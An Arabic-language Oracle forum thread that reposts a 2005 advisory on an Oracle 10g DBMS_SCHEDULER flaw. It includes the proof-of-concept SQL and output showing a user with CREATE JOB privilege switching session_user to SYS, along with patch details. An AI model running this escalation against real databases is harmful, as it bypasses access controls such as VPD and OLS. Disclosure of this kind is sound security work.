الانتقال إلى المحتوى

ثغرة في اصدار اوراكل

-=|mOOdY|=-

بواسطة -=|mOOdY|=-
في منتدى أوراكل العام - General Discussion

 مشاركة

Recommended Posts

-=|mOOdY|=- مستشار

-=|mOOdY|=-

بتاريخ:
بتاريخ: (معدل)

اثناء تجوالي(بتعرفو انا بسافر كثير :huh: ) في احد المواقع (الاجنبية طبعا لان المعلومة عن الاوراكل في المواقع العربية ستكون هنا اولا) لفت انتباهي موضوع عن وجود ثغرة تمت ترقيتها في 5/ 2005 واحنا ما معنا خبر :) :) :rolleyes:

المهم الثغر مش بسيطة فهي تقوم بتحويلالمستخدم العادي الى اليوزر sys :blink: :blink: نعم sys


وهذا مفاد المقال

DBMS_SCHEDULER SESSION_USER issue in Oracle 10g

Name	 DBMS_SCHEDULER SESSION_USER issue in Oracle 10g
Systems Affected	 Oracle 10g
Severity	 Medium Risk
Category	 Switch Oracle Username to user SYS
Vendor URL	 http://www.oracle.com/
Credit	 Oracle Metalink Forum 633336.995
Exploit	 Forum Entry removed by Oracle
Date	 07 May 2005 (V 1.02)
VU#	 176909

Details

The following proof of concept exploit code (from Metalink) allows any user with CREATE JOB privileges to switch the session_user to SYS. This statement is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security) and could allow privilege escalation. The old deprecated current_user shows the right user.

Example
Connect as a user with CREATE job privilege

SQL> select user from dual;

USER
---------
JOBUSER

SQL> execute dbms_scheduler.run_job('ANY_JOB');

PL/SQL procedure successfully completed.

SQL> select user from dual;

USER
---------
SYS

SQL> select (sys_context('userenv','session_user')) from dual;

USER
---------
SYS

SQL> select (sys_context('userenv','current_user')) from dual;

USER
---------
JOBUSER

SQL> show user

USER is "jobuser"



Patch Information
Apply the patches for Oracle Critical Patch Update October 2005.


History
05-may-2005 US CERT VU# added (V1.01)
07-may-2005 Oracle removed the forum entry from Metalink (V1.02)
18-oct-2005 Oracle released CPU October 2005


تحياتي

تم تعديل بواسطة moody_4u
رابط هذا التعليق
شارك
  • بعد 2 شهور...
  • بعد 5 أسابيع...
  • بعد 4 أسابيع...
  • بعد 3 أسابيع...
  • بعد 3 أسابيع...
Shibeika مستخدم مقيم

Shibeika

بتاريخ:
بتاريخ:

السلام عليكم ورحمة الله وبركاته
شكرا أخي علي هذه المعلومة

رابط هذا التعليق
شارك
  • بعد 2 أسابيع...

انضم إلى المناقشة

يمكنك المشاركة الآن والتسجيل لاحقاً. إذا كان لديك حساب, سجل دخولك الآن لتقوم بالمشاركة من خلال حسابك.

زائر
أضف رد على هذا الموضوع...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   تمت استعادة المحتوى السابق الخاص بك.   مسح المحرر

×   You cannot paste images directly. Upload or insert images from URL.

جاري التحميل
×
 مشاركة
عودة لقائمة الموضوعات
×
×
  • أضف...

برجاء الإنتباه

بإستخدامك للموقع فأنت تتعهد بالموافقة على هذه البنود: سياسة الخصوصية

  أوافق